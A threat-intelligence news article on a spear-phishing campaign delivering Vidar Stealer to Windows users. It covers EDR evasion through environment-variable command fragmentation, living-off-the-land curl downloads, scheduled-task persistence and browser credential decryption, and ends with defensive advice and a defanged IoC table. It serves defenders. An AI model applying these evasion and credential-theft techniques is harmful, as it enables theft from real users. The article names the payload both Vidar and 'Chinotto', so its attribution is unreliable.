New Vidar Stealer Campaign Evades EDR, Steals Credentials
Key Takeaways A new, sophisticated campaign is distributing Vidar Stealer, actively targeting Windows users. The malware employs advanced evasion techniques, including multi-stage delivery and...
Key Takeaways
- A new, sophisticated campaign is distributing Vidar Stealer, actively targeting Windows users.
- The malware employs advanced evasion techniques, including multi-stage delivery and environment variable obfuscation, to bypass Endpoint Detection and Response (EDR) solutions.
- Initial compromise occurs via spear-phishing emails containing malicious shortcut files, leading to the theft of browser credentials, session cookies, and cryptocurrency wallet data.
- The campaign utilizes Living-off-the-Land (LotL) tactics and creates deceptive scheduled tasks for persistence.
Stealthy Vidar Stealer Campaign Evades EDR, Targets Windows Users for Credential Theft
A highly sophisticated and stealthy campaign is currently deploying Vidar Stealer against Windows users, leveraging an intricate attack chain specifically designed to circumvent Endpoint Detection and Response (EDR) systems and extract sensitive user credentials. This operation is notable for its quiet execution, often completing its malicious objectives before victims are aware of any compromise.
Table Of Content
Vidar Stealer, an information-stealing malware first identified in 2018 as a variant of the Arkei stealer, has continuously evolved. It possesses robust capabilities for extracting browser passwords, session cookies, cryptocurrency wallet information, authentication tokens, and autofill data stored locally on infected systems. The latest iteration of this malware enhances these capabilities with advanced evasion mechanisms, allowing it to consistently bypass modern EDR tools.
Security researchers at Genians Security Center were instrumental in identifying and analyzing this campaign. Their findings highlight the use of multi-stage delivery techniques, heavily obfuscated script execution, and the abuse of legitimate system utilities to avoid triggering security alerts. This blend-in approach makes the campaign particularly dangerous for organizations that primarily rely on traditional signature-based detection methods.
Initial Access and Evasion Tactics
The attack typically begins with highly targeted spear-phishing emails, meticulously crafted to align with the recipient’s professional context or personal interests. These emails contain ZIP archives that, when opened, reveal Windows shortcut files disguised as ordinary work documents. Executing these shortcut files silently triggers an obfuscated command in the background, without any visible indication to the user.
The malware proceeds through a series of secondary payload downloads, ultimately deploying its core information-stealing component. Each stage of this process employs environment variable-based obfuscation, where commands are reconstructed only at runtime. This technique often defeats static analysis tools, preventing early detection and response.
A critical aspect of this campaign’s evasion strategy involves preventing behavior-based detection. Threat actors utilize environment variable-based substring expansion to fragment and reassemble commands character by character. This ensures that the complete malicious command string never appears in plaintext during execution, forcing security tools to analyze individual fragments rather than recognizing the full intent of the instruction. Additionally, the attackers leverage curl.exe, a native Windows binary, to download further payloads from remote servers. This “Living-off-the-Land” (LotL) tactic makes detection challenging, as legitimate system tools are being used. A Python Embed package is also retrieved from a trusted external source, establishing a silent execution environment and minimizing suspicion associated with outbound network activity.
For persistence, a scheduled task is created, deliberately named to mimic a legitimate Microsoft system process (e.g., “MicrosoftMusicLibrariesPackageTaskMachine”). This ensures the malware runs at one-minute intervals and survives system reboots. The final payload, a compiled Python bytecode file disguised with a .cat extension, functions as a remote access backdoor, capable of executing commands, collecting files, and exfiltrating system data to attacker-controlled infrastructure.
Credential Theft and Broader Impact
Vidar’s primary objective in this campaign is to exfiltrate user credentials and other sensitive data from Chromium-based browsers and similar applications. It specifically targets locally stored passwords, session cookies, and encrypted key files used by browsers to protect login information. The malware employs the Windows CryptUnprotectData API to decrypt these keys directly from the browser’s Local State file, thereby gaining full access to saved credentials.
Investigations revealed multiple command-and-control (C2) domains spread across various countries and hosting providers, complicating infrastructure-based blocking efforts for defenders. The widespread deployment of these credential theft tools underscores the broad impact across numerous sectors.
What You Should Do
- Enhance EDR capabilities with robust behavior-based detection to identify obfuscated script execution and multi-stage download activities.
- Implement policies to block the execution of shortcut files (LNK files) from within compressed archives, especially those received via email.
- Regularly audit scheduled tasks on endpoints for any suspicious entries that mimic legitimate system processes.
- Advise users against saving credentials directly within web browsers; instead, encourage the use of reputable password managers.
- Conduct ongoing security awareness training to educate employees about the dangers of spear-phishing and malicious attachments.
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| Domain | kmot.co[.]kr | Korea-based C2 server hosting malicious payloads |
| Domain | haeundaejugong[.]com | C2 server used to collect and exfiltrate user data |
| Domain | kumdo[.]org | Secondary C2 server for data exfiltration |
| Domain | nls5950.cafe24[.]com | C2 infrastructure used in related malicious activity |
| Domain | hanainternational[.]net | C2 domain linked to threat actor infrastructure |
| Domain | mlgpf.ir114[.]net | C2 domain associated with campaign |
| Domain | luminix[.]kr | C2 domain identified in related malicious files |
| Domain | sunlin[.]org | C2 domain observed in threat actor infrastructure |
| Domain | ezvm[.]kr | C2 domain linked to malicious distribution |
| Domain | intobiz[.]kr | C2 domain used in campaign infrastructure |
| Domain | choisy[.]fr | France-based C2 server observed in attack chain |
| Domain | printory[.]kr | Domain used to host compiled Python bytecode malware |
| Domain | udcontest[.]com | Domain hosting webshell used in phishing attack |
| Domain | ableinfo.co[.]kr | Distribution infrastructure for malicious files |
| IP Address | 114.207.246[.]156 | IP address shared across multiple attack domains |
| File Name | settingenv.cat | Compiled Python bytecode payload disguised as Windows catalog file |
| File Name | codeflush.exe | Renamed pythonw.exe used as stealthy malware execution host |
| File Name | GX)/M27s.bat | Obfuscated batch file used for secondary payload execution |
| File Name | ms3360.bat | Batch file variant used in obfuscated execution chain |
| File Name | yS1825.bat | Batch file variant identified in attack chain |
| File Name | K3772.bat | Batch file variant used in environment variable obfuscation |
| File Name | HqcUpdate.exe | Final information-stealing payload (Chinotto) |
| File Name | WStep163.cab | Obfuscated Python script downloaded from C2 server |
| File Name | MicroAppsTemp28h2.bat | Batch file downloaded from C2 for follow-up activity |
| Scheduled Task | MicrosoftMusicLibrariesPackageTaskMachine | Persistence mechanism disguised as legitimate Microsoft task |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.